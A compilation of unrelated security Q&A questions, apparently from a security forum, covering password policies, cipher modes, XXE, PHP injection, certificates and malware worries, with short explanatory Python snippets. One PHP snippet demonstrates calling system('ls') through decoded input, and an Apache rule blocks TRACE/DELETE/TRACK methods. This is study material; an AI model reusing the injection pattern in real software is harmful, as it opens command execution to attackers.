Having a more-than-elementary knowledge of internet security, I've realized that some web applications and websites I use implement a less-than-ideal password policy. Some examples include: implementing a password-length upper bound (upper bounds I have seen are 16, 20, and 32); requiring the presence of arbitrary characters; forbidding the presence of arbitrary characters (such as spaces, %, ^, and others). These kinds of practices make me worry that the server-side password handling is equally questionable. Thus I'm wondering if it would be a good idea to implement my own script (drawing on tried-and-true methods) to create a hash of my password on my local machine, rehash it until it meets the site's arbitrary requirements, and use that as my 'password'.
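The local-hashing idea described above does exist; it is roughly what the PwdHash research prototype did. Here is a rough sketch under stated assumptions: PBKDF2 for the derivation, an arbitrary iteration count and length, and a naive suffix to satisfy typical "must contain a digit/symbol" rules. None of these parameter choices are recommendations:

```python
import base64
import hashlib

def derive_site_password(master: str, site: str, length: int = 16) -> str:
    # Deterministic per-site password derived from a master secret
    # (PwdHash-style idea): same inputs always yield the same password.
    digest = hashlib.pbkdf2_hmac("sha256", master.encode(), site.encode(), 100_000)
    body = base64.b64encode(digest).decode()[: length - 2]
    # Crude way to pass "must contain a digit and a symbol" rules.
    return body + "9!"
```

A real tool would also map the output into each site's *allowed* character set (base64 contains `+` and `/`, which some sites forbid), which is exactly why forbidden-character rules make this harder than it should be.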
I recently came across an application that more or less does this:
- starts from a (supposedly unknown to others) key
- generates a random IV
- encrypts some smallish (~160 bytes) payload with the key and the generated IV using AES-256 in CBC mode [>=60% of the payload consists of two or three ASCII words, chosen from a supposedly unknown but more or less easily guessable list of some dozen elements]
- derives another IV just by doing some math on the key; this IV will be the same for every packet, ever, and the code to generate it from the key is publicly known
- encrypts a small header (32 bytes) with the key and the derived IV using AES-256 in CBC mode [most of this header is fixed data such as "protocol version" that should be considered publicly known; it also contains a Unix timestamp (known data if you know when the packet was transmitted) and the random IV used above for the payload part]
- transmits the resulting encrypted header+payload on the wire
The receiving side knows the (pre-shared) key, regenerates the "header IV" from it, decrypts the header, gets the payload IV from there, and decrypts the payload. The whole process repeats for every packet, and the typical application would have anywhere from 5 to 50 packets per second going on the wire; since many of them are just "status info", the only difference between their cleartexts would be the Unix timestamp and the (pseudo)randomly generated payload IV. I'm definitely no cryptography expert, but as far as I know "a fixed IV derived from the key, used to encrypt 32 bytes, 28 of which are fixed and/or easily guessable" should at least ring some alarm bells. How should the security of such an approach be assessed? - "security" defined as keeping the key and/or the payload secret even if someone can eavesdrop on packets from the wire.
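The alarm bells are justified: with a fixed IV, CBC becomes deterministic, so packets whose headers share a plaintext prefix produce identical leading ciphertext blocks, leaking equality of (mostly known) header fields across packets. The toy below demonstrates the effect. The 16-byte "block cipher" is just a hash-based stand-in for AES (sufficient for the encryption direction of this demonstration), and the header contents are invented:

```python
import hashlib
import os

BLOCK = 16

def _block_enc(key, block):
    # Toy 16-byte block function standing in for AES (not invertible,
    # which is fine for demonstrating CBC chaining on the encrypt side).
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cbc_encrypt(key, iv, plaintext):
    assert len(plaintext) % BLOCK == 0
    prev, out = iv, b""
    for i in range(0, len(plaintext), BLOCK):
        blk = bytes(a ^ b for a, b in zip(plaintext[i:i + BLOCK], prev))
        prev = _block_enc(key, blk)
        out += prev
    return out

key = b"k" * 16
fixed_iv = b"\x00" * 16
header1 = b"PROTO v1........" + b"timestamp A....."
header2 = b"PROTO v1........" + b"timestamp B....."
c1 = cbc_encrypt(key, fixed_iv, header1)
c2 = cbc_encrypt(key, fixed_iv, header2)
# With a fixed IV, the shared first block encrypts identically:
assert c1[:BLOCK] == c2[:BLOCK]
# With random IVs, even identical plaintexts encrypt differently:
assert cbc_encrypt(key, os.urandom(16), header1) != cbc_encrypt(key, os.urandom(16), header1)
```

So an eavesdropper comparing the first ciphertext blocks across packets immediately learns which packets share header fields, defeating the whole point of a CBC IV, even though the key itself is not directly revealed.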
I am not able to configure Burp Suite to work with my browsers. If I use manual connection settings in the browser, I cannot load any site, because my company uses a proxy. Here is what I have tried, without success: I set the manual proxy to 127.0.0.1:8080, but after that change my browser could not load any site, even though Burp Suite was working at the time and I could see the requests in it. How can I configure Burp Suite to work with my browsers?
Our application uses loadXML extensively to receive data (input) from users. Other than the usual checks for SQL injection and XSS, are there any known risks in parsing the XML with loadXML? The XML files are limited in size and will be under 2 MB. Could someone potentially create an XML file with a malicious payload? https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) I read these links but I am not sure whether we can safely rely on loadXML or not. If not, what methods should we use to sanitize or validate an XML file as safe?
So I was just reading up on the OWASP site about PHP Object Injection. According to their site, the suggested fix is to not use serialize and unserialize but to use json_encode and json_decode. However, after doing a few tests in a limited amount of time, I have found that this isn't the case at all. For example (working Codepad example): <?php function e($method, $args) { return $method($args); } var_dump(call_user_func_array("e", array((string)array_shift(json_decode("[\"system\"]")), "ls" ))); ?> So, my questions are: Would you agree with me that this is not the case, and that there should be more of a suggested fix than just using the json_* functions? Am I actually correct in assuming what I have done is correct?
Is it possible to execute a remote shell exploit against a router if its remote administration feature is locked down to a single IP/range? If so, why? This has been an ongoing office debate for a while now. I claim that it would be possible, as it is likely the internal web server and the technologies it uses (CGI etc.) that handle that remote authentication, but many people say that it wouldn't be possible to execute a remote shell because it's locked down by IP. Who is right?
The situation comes down to this: When I sign in to Hotmail, it retrieves my messages by connecting to other providers, which it could only do by using my email and password for those providers. Since I signed in a couple of days ago, I do not need to enter my email/password again: Hotmail doesn't ask me for any secret about me/this specific session. From these points, I can only infer: either they store a master password derived from my original password in my cookies, and when I come back they use that to decrypt the stored provider credentials; or they have the credentials stored using a master, per-site password. However, both of these solutions seem really weak. Any idea on how to implement a secure, cookie-persistent connection while encrypting passwords? Note: please read this question from me about why I'm saying encrypt and not hash passwords.
I was curious about some best practices for securing Outlook against hackers. The data transmitted between the email server and the client is almost always encrypted these days, but I haven't seen a great deal of security once the mail is actually on the local machine. If someone were to gain access to your machine, whether it be Outlook or Thunderbird, they now also have access to any email service you're logged into. The stored archives can be password protected, but that does nothing for active mail in the inbox. My question is: how does one secure email on the actual machine from prying eyes? And yeah, I know: unless it's PGP, email isn't secure. Edit: Correction, PGP isn't secure either once it's 'open'/decrypted on the local machine. Solution: TL;DR - No direct solution other than encrypting the drive it's on. I asked on Microsoft forums and was directed to Symantec, and was basically told that there is no way to lock Outlook itself or individual emails, but rather to rely on BitLocker.
Does having a nonce in CTR mode actually improve security (vs. just using 1, 2, 3, etc. - basically a constant nonce of 0)? As far as I can tell, the best-case scenario security-wise is that the nonce could act as a sort of second key, which would also be shared securely between the communicating parties. But if the underlying block cipher is secure (let's say AES-128), that should be both unnecessary and unhelpful...right? It seems to me that specifying a nonce only gives a false sense of added security. Am I missing something?
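One thing the nonce does that the key cannot: it keeps the keystream unique across messages encrypted under the same key. If a (key, nonce) pair is ever reused, CTR degenerates into a two-time pad. A small demonstration of that failure, using a hash-based keystream as a stand-in for AES-CTR (the Python stdlib has no AES); the messages are made up:

```python
import hashlib

def ctr_keystream(key, nonce, length):
    # Toy CTR-style keystream: hash(key || nonce || counter), a stand-in for AES-CTR.
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

key = b"k" * 16
nonce = b"\x00" * 8              # the SAME nonce used for both messages
p1 = b"attack at dawn!!"
p2 = b"retreat at noon!"
c1 = xor(p1, ctr_keystream(key, nonce, len(p1)))
c2 = xor(p2, ctr_keystream(key, nonce, len(p2)))
# Reusing the keystream cancels it out: c1 XOR c2 == p1 XOR p2, so an
# eavesdropper learns the XOR of the plaintexts without ever knowing the key.
assert xor(c1, c2) == xor(p1, p2)
```

So a constant nonce of 0 is only safe if each key encrypts exactly one message, ever. The nonce adds no secrecy and is not a second key; its job is precisely to make encrypting many messages under one key safe, which is why "1, 2, 3, ..." (a counter, never repeated) is a perfectly valid nonce sequence.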
I'm new to the IT Security Stack Exchange! This is my question: I have Skype installed on my Windows 7 computer. In the last few months I've noticed my mouse cursor blinks (I mean it shows the cursor that appears when the computer is processing something) every time I type or click while Skype is in focus. I think this could mean someone has installed a keylogger or some kind of malware on my PC, or I could just be paranoid about this. This happened some time after I gave out my Skype name online because somebody wanted to collaborate with me on a project. I've run multiple antivirus scans with Avast! free AV and scans with Malwarebytes Anti-Malware, even in Safe Mode on that computer. Not one scan has turned up any kind of malware detection! Another important detail is that I keep getting unsolicited contact requests on Skype as well. I don't know who they are, so I decline and mark them as spam. I wanted to ask this question here, though I don't know if it's much to go on. I don't know a whole lot about computer security.
I used encfs to encrypt some important files on my system, but sadly I forgot the encryption key. I still have decrypted versions of some of the encrypted files. Is there a way to recover the encryption key if I have the two versions of a file (the encrypted and the decrypted one), so I can use the key to get the rest of my files? encfs uses OpenSSL AES with a 256-bit key size.
Following the breach of the Avast forum (forum.avast.com), they decided to host the database externally at id.avast.com. My question is: what is the point of hosting the database externally, since if you get remote code execution on forum.avast.com (which has access to the database hosted on id.avast.com), you can steal the database anyway? Is it so no data is lost/destroyed?
I would like to know how an ATM pinhole camera works. Does the pinhole camera record only once a card is inserted into the ATM, or only during the cash withdrawal, or does it record all the time?
Let's say we create a flyer in some desktop publishing software (e.g., InDesign, Illustrator), physically print it and post it somewhere. We don't want inauthentic claims of authorship. Is there a way to, say, put a [?] on the flyer that only we could have generated. Or, that someone claiming to author the flyer cannot prove they generated. (We are fine in revealing ourselves if we have to prove we generated it, it's more to defend against others claiming they did.) Or should it be a message that no-one can decrypt? This might be a simple public key problem, but if someone could list specifics of how we'd do it, it'd be much appreciated!
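A public-key signature printed on the flyer (e.g. as a QR code, with the public key published somewhere under your name) is the standard answer. As a lighter-weight illustration of the same "only we could have generated it" property, here is a hash-commitment sketch in Python; the flyer text and nonce size are arbitrary choices:

```python
import hashlib
import os

def commit(message: bytes):
    # Print the commitment on the flyer; keep the nonce secret.
    # Revealing (nonce, message) later proves you created the commitment,
    # since nobody else can produce a matching pair without the nonce.
    nonce = os.urandom(16)
    commitment = hashlib.sha256(nonce + message).hexdigest()
    return nonce, commitment

def verify(nonce: bytes, message: bytes, commitment: str) -> bool:
    return hashlib.sha256(nonce + message).hexdigest() == commitment

nonce, c = commit(b"Flyer text, 2014 edition")
assert verify(nonce, b"Flyer text, 2014 edition", c)
```

Note the caveat: a commitment proves *knowledge of the nonce*, not identity, and it only works if you can show you held the nonce before any rival claim. A signature against a public key you have published in advance proves both, which is why it is the more robust choice.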
I've understood that the following steps are taken when I log in to a site: 1. My password is hashed. 2. The hash is compared to what's stored in the database. 3. If the hashes are equal, I can log in. I'm also quite certain that if attackers gain access to the password database, they can use brute force to find the clear-text passwords if the hashing algorithm is weak enough. My question is: is there any way for an attacker to bypass step 1 above? I.e., if they have gained access to a list of hashed passwords, can they present a hash to the server directly, thus circumventing the hashing step?
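Whether a stolen hash can be "replayed" depends on what the client actually transmits. In the common web scheme, the client sends the plaintext password and the *server* performs step 1, so submitting the stolen hash just gets it hashed again and the comparison fails. A toy sketch (plain SHA-256 stands in here for a proper salted, slow hash such as bcrypt):

```python
import hashlib

def hash_pw(password: str) -> str:
    # Illustrative only: real systems should use a salted, slow hash (bcrypt/scrypt).
    return hashlib.sha256(password.encode()).hexdigest()

stored = hash_pw("hunter2")  # what the database holds

def login(submitted: str) -> bool:
    # The server always hashes whatever string the client submits.
    return hash_pw(submitted) == stored

assert login("hunter2")   # the real password works
assert not login(stored)  # submitting the stolen hash gets re-hashed and fails
```

The situation differs in protocols where the hash itself *is* the authenticator (Windows NTLM is the classic case): there, "pass-the-hash" attacks work exactly as you describe, because possessing the hash is equivalent to possessing the password.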
As we all know, when an SSL certificate is issued, a trust chain is created to verify everyone from the certificate authority down to the actual website's SSL certificate. Thanks to a good discussion with a security expert, I am led to believe that this trust chain is flawed in the way it is done. After so long in the chain, it seems like you are just blindly trusting everyone who issues/controls the certificate, even the certificate authority. Is this method blindly trusting the certificate authorities, root authorities, and everyone else that processes the SSL certificate? I see this as a major flaw in a system which we hold dear and use.
It's "time to add a word", says Arnold Reinhold, the creator of Diceware, in his blog (3/2014). He advises using 6-word passphrases (or 5 words with one extra character chosen and placed at random) from now on. Reasons given include that back in 1995 he predicted the likelihood of such a change around 2014, and that "Today criminal gangs probably have access to more computing power then the NSA". There is evidence and there are hints (Wikipedia ("On the other hand ...") and Stack Exchange (my comment on Goldberg's answer)) that there are (slight?) weaknesses in the Diceware word lists (not in the method). Understanding the evidence in "Improving the Diceware memorable passphrase generation system" is beyond my math capabilities. I do understand, though, that the average recovery time of a 4-word passphrase can indeed be reduced because ~22-character passphrases are the most likely ones. And if the passphrase character count is somehow known, even the exhaustive recovery time may be reduced. However, Ars Technica mentions (3/2014 update) an email received from Gosney in which he wrote: "Since there are no tools that currently combine three or more words, we don't really know for sure how much slower it would be compared to his 25 GPU monster cracks." Are there really no tools and performance measurements available for cracking 3-word or larger Diceware passphrases? I have tried to find measurements and can only find grammar-based proof-of-principle recovery of phrases. Added in 2 steps after the answers of Thomas Pornin and Arnold Reinhold: Arnold Reinhold acknowledges one word list weakness (Diceware words can run together: "act" and "ion" form "action"). Arnold Reinhold: "I now recommend that users of Diceware put a space character between each word, which completely eliminates this problem." Yet, what is a new formula for calculating the entropy of a passphrase when spaces are not used?
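For reference, the baseline entropy numbers: with unambiguous word separators, each word contributes log2(7776) ≈ 12.9 bits regardless of its length, so the totals are straightforward to compute:

```python
import math

WORDLIST_SIZE = 7776  # 6^5 words in the Diceware list
bits_per_word = math.log2(WORDLIST_SIZE)  # ~12.92 bits per word

for n in (4, 5, 6):
    print(f"{n} words: {n * bits_per_word:.1f} bits")
```

Without separators the true figure is somewhat lower, because distinct word sequences can collide once concatenated ("act"+"ion" vs "action"). Quantifying that loss exactly requires counting the colliding concatenations in the word list, which is precisely the open question raised above; the space-separator recommendation restores the clean n·log2(7776) formula.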
I am using Firefox version 28.0. To access https://www.yahoo.com, I put a proxy with a self-signed certificate in between, and my client PC can access the HTTPS site. I then sniffed traffic on my client PC and observed a strange thing: each HTTPS request sent from Firefox is split into two TCP segments. One is only one character long ("G"), the other contains the rest ("ET / HTTP 1.1 ..."). Why does Firefox behave like this?
Is checking the state of the supporting files of the Windows registry hives enough to detect whether new software/malware has been installed on the computer or a given Windows registry key has been modified? By checking the state I mean verifying, for example, the last modification date, the size of the file, and so on; something I can do with a Python function, for example. It could be helpful to remember that the supporting files of the Windows registry hives are SAM, SECURITY, SYSTEM, SOFTWARE, DEFAULT and NTUSER.DAT. Maybe the best way to ask the question: what is the full ASEP list to monitor for any eventual malware (or even legitimate software) installation?
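As a sketch of the metadata-snapshot idea (the paths you would pass in are placeholders; note that on a running Windows system the hive files are locked, so their metadata is best read offline or from a volume shadow copy):

```python
import os

def snapshot(paths):
    # Map each path to (size, mtime), or None if the file is absent/unreadable.
    state = {}
    for p in paths:
        try:
            st = os.stat(p)
            state[p] = (st.st_size, st.st_mtime)
        except OSError:
            state[p] = None
    return state

def changed(before, after):
    # Paths whose size or modification time differs between two snapshots.
    return sorted(p for p in before if before[p] != after.get(p))
```

Keep in mind this only tells you *that* a hive changed, not *what* changed, and timestamps can be forged by malware; diffing exported hive contents, or using a dedicated ASEP scanner such as Sysinternals Autoruns, is far more reliable for the detection goal you describe.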
After reading the question about a manipulated Google Analytics script, I wonder how you would protect against this kind of attack. What comes to mind is configuring a fixed DNS server IP in the network configuration, or using a tunnel, but in both cases you would not detect the attack. Is there a way to protect yourself and also be able to detect the attack?
I have a client who is looking to hold personal information such as driving licences and insurance documents in order to verify that a user of the site is who they say they are and lives where they say they live (the site is a sort of brokerage). We were looking at storing this information in an offsite solution such as Amazon S3; obviously it will be encrypted before it is sent from our server, and pulled down and decrypted when we need it, but is this enough? Are there extra levels of compliance I need to meet? Forgive my ignorance with this; I'm by no means a security expert and just want to know if this is something we should even be considering.
The internet is full of guides on how to remove malware from already infected computers. Normally, step 1 is to enter Safe Mode, so that the virus can't interfere with the antivirus program as easily. But if you got infected and you shut down your computer, the virus could have time to encrypt itself, and when you later scan your computer in Safe Mode, the antivirus program can't find the data that the virus encrypted. My question is the following: if a virus did all of the above, would that make it undetectable, or would the AV find the decryption module and therefore detect the virus? Thanks in advance!
Could someone please enlighten me, either on a technical level or high level if that detail is not feasible, on how tracker cookies and beacons work. Particularly, how information on my browsing habits (shopping suggestions) can be persisted between different machines even when I only use one for work, never logging into personal accounts. I'm not too concerned with my ISP knowing what I've visited but I resent companies collecting data for targeted advertising. I already use the Ghostery add-on for Chrome. Do I need to start using VPN services? I didn't think companies were able to get information on your internet usage this way anyway. Many thanks everyone.
What is the relationship between the Suite B algorithms and FIPS 140-2 certification? Does OpenSSL meet both criteria? From what I've read, it seems that OpenSSL's crypto library implements many algorithms, and the FIPS 140-2 Object Module covers a subset of those algorithms. Further, it seems that Suite B is an even smaller subset of the FIPS 140-2 certified algorithm list. Is this correct? Am I on the right path? Any clarity would be appreciated. Thanks.
Does blocking HTTP HEAD requests help to harden an Apache web server, or would this restriction be an exaggeration? What kind of vulnerability can be exploited via the HEAD method? Tests:

$ lynx --dump --head http://www.terra.com.br
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 16 Jul 2014 14:44:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Connection: close
Vary: Accept-Encoding
X-Cache-Status: HIT
Content-Language: pt-BR
X-Ua-Level:
Set-Cookie: prisma=WEB-20; path=/; domain=.terra.com.br
Set-Cookie: prisma=WEB-20; path=/; domain=.terra.com.br
Age: 0
Vary: Accept-Encoding, X-UA-Device, X-prisma
X-Device-Type: web
X-Xact-Hosts: montador=1sh
X-Xact-Uuid: be9ef8c3-163a-40af-8472-0982226424e1
X-Ua-Compatible: IE=Edge
Cache-Control: no-cache
X-Ua-Device: Lynx/2.8.8rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/1.0.1g
Set-Cookie: X-XAct-ID=da20bbf3-3a14-4d86-a23b-6fe36f5adae9; Domain=terra.com.br; expires=Wed, 31 Dec 2036 00:00:00 GMT; Path=/
Set-Cookie: novo_portal=1; Domain=terra.com.br; expires=Mon, 01 Sep 2014 00:00:00 GMT; Path=/

$ lynx --dump --head http://www.myserver.com.br
HTTP/1.1 403 Forbidden
Date: Wed, 16 Jul 2014 14:44:44 GMT
Server: Apache
Last-Modified: Tue, 01 Apr 2014 05:28:27 GMT
Accept-Ranges: bytes
Content-Length: 4874
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

UPDATED: Does the answer for the GET method also apply to the TRACE, DELETE or TRACK methods? Apache conf:

RewriteCond %{REQUEST_METHOD} ^(TRACE|DELETE|TRACK) [NC]
RewriteRule .? - [F]
I have come across a few Android apps that provide various features for communicating with a desktop machine (sending text or typing in one direction or another, controlling the desktop pointer with the mobile device, sending mobile notifications to the desktop, etc.). Most of them rely on both machines being on the same network, running a small server application on the desktop which opens a port for communication (or the other way round if you're controlling the mobile device from the desktop). Generally they have no provisions for authentication. The obvious security flaws are: No authentication: anyone else can easily hop onto the open device/desktop via the open port and control it just as you can. No encryption: anyone can read the stream between the two computers. Most of the open source apps are up-front about this, and simply advise that you only use them on a trusted network. Some also offer USB access via adb. I am looking for apps that do not have these flaws (or, potentially, suggesting a new mechanism to an existing app). What existing mechanisms are there for communicating over-the-air between an Android device and an Ubuntu desktop? Bluetooth? (If the mechanism is generalisable to other platforms, that's also great. If it's more theoretical, like a protocol that needs to be implemented on Android, that's valid too, as there are people doing things like implementing mosh for Android.)
I am running a Windows XP virtual machine on a Windows XP host machine. I use the VM for suspicious websites and software/applications. If a keylogger gets installed in my VM, will it capture keyboard activity when I type on the host machine?
I was wondering how PGP works with a CC. In my understanding, if I send an e-mail to foo@example.com and use baz@example.org in the CC, Enigmail would have to encrypt the e-mail once for every user and send two e-mails. But in reality, if baz@example.org checks his e-mail he is still listed as CC and not as the main recipient (which would be the case if the e-mail were encrypted once for everyone). So how exactly does it work?
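The second guess above is the right one: OpenPGP uses hybrid encryption. The message body is encrypted exactly once with a random session key, and that session key is then encrypted separately to each recipient's public key (To and CC alike), so everyone receives the same message with the same headers. Here is a toy Python simulation of that structure, with XOR standing in for both the public-key wrap and the body cipher:

```python
import hashlib
import os

def wrap(recipient_key, session_key):
    # Toy key-wrap, standing in for RSA/ElGamal encryption to a recipient's
    # public key. XOR means wrap() is its own inverse (unwrap == wrap).
    pad = hashlib.sha256(recipient_key).digest()[:len(session_key)]
    return bytes(a ^ b for a, b in zip(session_key, pad))

def pgp_style_encrypt(body, recipient_keys):
    session_key = os.urandom(16)
    keystream = hashlib.sha256(session_key).digest() * (len(body) // 32 + 1)
    ciphertext = bytes(a ^ b for a, b in zip(body, keystream))  # body encrypted ONCE
    # One small wrapped-session-key packet per recipient:
    wrapped = {name: wrap(k, session_key) for name, k in recipient_keys.items()}
    return ciphertext, wrapped

body = b"Hello To and CC alike"
ct, wrapped = pgp_style_encrypt(body, {"foo@example.com": b"A" * 16,
                                       "baz@example.org": b"B" * 16})
```

So Enigmail sends one e-mail, not one per recipient; the per-recipient cost is only the small key-wrap packets attached to the message, and the CC header survives because the message itself is never duplicated or re-encrypted.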
What's the best way to hash a credit card number so that it can be used for fingerprinting (i.e. so that comparing two hashes will let you know if the card numbers match or not)? Ideally, I'm looking for recommendations of which hash + salt might be well suited for this use-case. The hash would uniquely identify a particular card number. You can use this attribute to check whether two customers who've signed up with you are using the same card number, for example. (since you wouldn't have access to the card numbers in plain text) To give this some context, see the Stripe API docs and search for fingerprint. It's where I first heard about this concept. The credit card information will be stored on a secure machine (somewhere in the Stripe back-end) that's not accessible by the customer, and the API returns the fingerprint in order to allow the API consumer to make comparisons (e.g. to answer questions like has this card been used before?). Let's make this one clear, coz I know you're going to ask: I'm not trying to replicate it. I'm just curious to understand how this could be implemented
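A plain hash, even salted per record, is risky here because card numbers have very little entropy (on the order of 10^15 valid PANs, so an unkeyed hash can be brute-forced). The usual approach, and plausibly what Stripe-like fingerprints do (an assumption on my part, not documented fact), is an HMAC with a secret key held only on the secure backend:

```python
import hashlib
import hmac

SECRET = b"server-side-secret-key"  # hypothetical; kept in the secure backend only

def fingerprint(card_number: str) -> str:
    # HMAC rather than a plain hash: without SECRET, stolen fingerprints
    # cannot be brute-forced back to card numbers.
    normalized = card_number.replace(" ", "").replace("-", "")
    return hmac.new(SECRET, normalized.encode(), hashlib.sha256).hexdigest()
```

Same card, same fingerprint, so "has this card been used before?" is a simple equality check across customers. Note that a *per-card random salt* would destroy exactly that comparability, which is why a single secret key is the right shape for this use case.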
I have found a small encryption algorithm in a program and would like to identify it, in terms of its public name. I have programmed with DES and with TEA, but what I have here is not even similar to those. The algorithm en-/decrypts (exactly, only) 4-byte blocks, using 5 steps of left and right shifting and XORing. All calculations are crosswise combinations of the above; no substitution "S-boxes" are involved. I see a "seed"(?) of 8 bytes, there is another 4-byte block involved, and all encryption ends up in a 4-byte block for a 4-byte input. The encryption is done by executing 20 identical rounds with no other modification involved. I would like to identify the algorithm to make up my mind about the security of this piece of code. It isn't very high anyway because of the small block size, which allows a brute-force plaintext attack, but I am just interested in the background of this. If I had a shortlist of candidate algorithms, I would try to find the final match by myself, but as far as I have looked into others I was lost by my missing general knowledge. Update: I saw the answered question about a base64-looking string (no information there was helpful for me), but I have a different case here. I do not want to identify an encryption by its output string format; I want to identify it by the parameters (functionalities used) of the algorithm I see in the code. I have added some more info in the description of the parameters I found. I am sure it is encryption (not a hash) because it works both ways. Thanks again for any support.
When a user is logged into a web-based application in multiple tabs and changes their password, should it automatically log them out of the other tabs? The use case: an account is compromised, the attacker logs in, the user also logs in and changes their password; however, since the attacker was already logged in, they are still granted access until they log out. This seems to require storing the password's bcrypt hash in the session, and then on every request checking the session's bcrypt hash against the bcrypt hash in the database. Is there an alternative approach?
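A common alternative that avoids putting password material in the session at all: record a password-changed-at timestamp (or a per-account session "generation" counter) on the account, and reject any session issued before it. A minimal sketch with hypothetical names:

```python
import time

class Account:
    def __init__(self):
        self.password_changed_at = 0.0  # updated whenever the password changes

def create_session(account):
    # Stamp each session with the time it was issued.
    return {"issued_at": time.time()}

def session_valid(session, account):
    # Any session issued before the last password change is rejected,
    # with no password hash stored in the session.
    return session["issued_at"] >= account.password_changed_at

acct = Account()
attacker = create_session(acct)          # attacker logs in first
time.sleep(0.01)
acct.password_changed_at = time.time()   # victim changes the password
victim = create_session(acct)            # victim logs in again afterwards
```

On each request this costs one comparison against a (cacheable) account field instead of a bcrypt verification, and bumping the timestamp doubles as a free "log out of all other devices" button.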
I am running a Windows 7 VirtualBox guest without internet connected. Internet is, however, connected to the host, and I allow any internet access to and from the host. On the guest platform I am working with some sensitive documents that I do not want any viruses or attackers to get. Can someone look at the VirtualBox hard drive stored on my host machine and extract the information from the files there? If so, how can this be completely prevented? I am a Python programmer with massive experience in algorithms (no internet or networking experience), so I was wondering if I could create a program to block all internet access to a given file. This program would be able to completely deny EVERYTHING on the host that tries to access it: programs, internet, anything. I am not sure if that can be done, though. Any suggestions would be greatly appreciated! In order to clarify the questions: How safe is VirtualBox when not connected to the internet? Can a listing of all internet access at a given time be obtained? How can everything be prevented from accessing the VirtualBox hard drive, or anything related, where important data can be stored? If anyone knows any Python-related security, how can this be implemented, if at all? P.S. I don't want a solution that encrypts the virtual hard drive to the point where I cannot use it. I want internet and foreign program access blocked, but still be able to use the guest VirtualBox machine from the host. Simply no outside access.
I could use a password manager, but I don't like relying on another entity than myself to store my passwords, and it would screw me over if I find myself on the internet in a new location without the database. So I want to use the correct horse battery staple method for my passwords (don't tell anyone,) and memorise all of them. But I'm not sure how I can remember which password is for which service. How can I mnemonically link each password to the particular service?
Found this article on using Live Boot Devices to do sensitive tasks such as online banking. While the article discusses the benefits of avoiding a possibly compromised host OS, it doesn't mention lower-level threats. Given increasing prevalence of sub-OS malware (e.g. BIOS, NIC, etc.), is there still a substantial increase in security from using Live Boot Devices? My understanding of the issue is that regardless of the OS you're booting to, compromised hardware has the potential to log and exfiltrate your activities. While the susceptibility of your personal machine may be less than public hardware (for instance, a hotel terminal), the security gained from a Live CD seems to be marginal. Basically: Are Live Boot Devices worth the bother? Is BIOS malware as common/dangerous as I have heard?
I'm looking to generate some new passwords for myself that are easy to remember, but hard to crack. By choosing a generation algorithm and generating one random password with it, I can be relatively confident of how hard to crack my password is. (I can calculate its entropy.) If, instead, I keep generating passwords until I see one I like, the security of my password is (significantly?) less. Worse, because I can't analyze my own mind like I could analyze an algorithm, I don't even know how insecure my password might be. It should be better (in terms of security) to control myself and say, before the password is generated, "whatever password is generated is the one I will use". But it might not be as easy a password to remember as "correct horse battery staple". It's hard to predict what will be easy/hard to memorize, and it can vary a lot from person to person. What about a happy medium, where I decide that I will generate exactly N (for example, 10) random passwords, and choose one of them? Would this be any worse than "1/N times" secure?
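The loss from cherry-picking can in fact be bounded: if you generate N candidates and pick your favourite, an attacker who perfectly models your preference gains at most log2(N) bits, because your choice reveals at most one-of-N information. So the proposed happy medium is quantifiable:

```python
import math

# Picking your favourite of N candidates costs at most log2(N) bits of entropy.
for n in (2, 10, 100):
    print(f"best of {n}: at most {math.log2(n):.2f} bits lost")

# Worked example: a 4-word Diceware phrase carries 4 * log2(7776) ~ 51.7 bits;
# choosing the nicest of 10 such phrases still leaves at least ~48.4 bits.
remaining = 4 * math.log2(7776) - math.log2(10)
```

So "generate exactly 10 and pick one" is at most about 3.3 bits weaker than committing to the first output, and you can compensate up front by generating slightly longer candidates. The bound only holds if you fix N in advance; "keep generating until I like one" has no such clean bound, which matches the intuition in the question.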
So I have a client-authentication cert installed on client PCs, which doesn't expire for 5 more years. Unfortunately, the cert on our gateway which is used to validate the client certs expires this month. I know... D'oh! Plan A is to place a new cert on our gateway and issue new client-auth certs to all of the clients. This is going to be very disruptive. It seems like it would be simpler to place a new cert on our gateway and have it continue to validate the existing client certs until they actually expire in 2019. This would be my proposed "Plan B". Is Plan B valid? I.e., can you have a new cert on the gateway honoring existing client certs, or do you have to re-generate everything "top-down"? I guess I'm asking if you can replace a link in the trust chain without breaking the chain. I'm sorry that this is over-simplified. I don't really understand all of this, but am struggling to find a loophole here that we can leverage. These certs are generated internally (our own CA) and are not used for SSL, only client-auth, attached to SOAP messages, within SSL (the SSL setup isn't expected to change). Thanks, Chris
For a cryptocurrency client implementation, I am serving a single-page webapp to mobile clients. It is a client-side-only page. I would like to serve this page to clients, but I fear tampering by hosts to change the code so that user passwords are intercepted. The passwords, with at least 128 bits of entropy enforced, are cryptocurrency signing key seeds. Unfortunately, and this may be erroneous, it seems that mobile browsers cannot open and run local HTML files, or if they can, they cannot run CSS or JS files. I'm aware of apps that allow this, but I'd prefer that to be a last resort so as to reach the least savvy users. Is the only option to physically manage a server myself to achieve the desired convenience?
I have two different crypto libraries I created, one is in java and uses the standard built-in java crypto libraries. The other uses openssl and has been wrapped in java through the JNI. I'm currently replacing the default java library code with the openssl library code, and verifying the encryptions against each other to make sure nothing breaks for my end user. I'm curious, because java is only guaranteed to support 128 bit keys using its implementation of PBKDF2, so I'm using AES CBC 128 with java. I had originally coded for AES CBC 256 in openssl, not thinking. What I'm curious about is this: When I input a 256 bit key into java's AES CBC 128, I got the same output as I did for openssl's AES CBC 256. When I input a 128 bit key into AES CBC 128, I got a different output than when I input the same key into openssl's AES CBC 256. (I used the same 16 byte IV across all trials) I assume the two different encryption schemes would generate completely different results, so I'm confused as to why this is happening. I thought I had a better understanding of the cipher than it appears I actually do. Apologies if this is a painfully obvious result, I'm still somewhat new to crypto.
If a user connects to an SSH server using an RSA private key but does not confirm the server's fingerprint, what kind of information can a man-in-the-middle attacker get from the session?
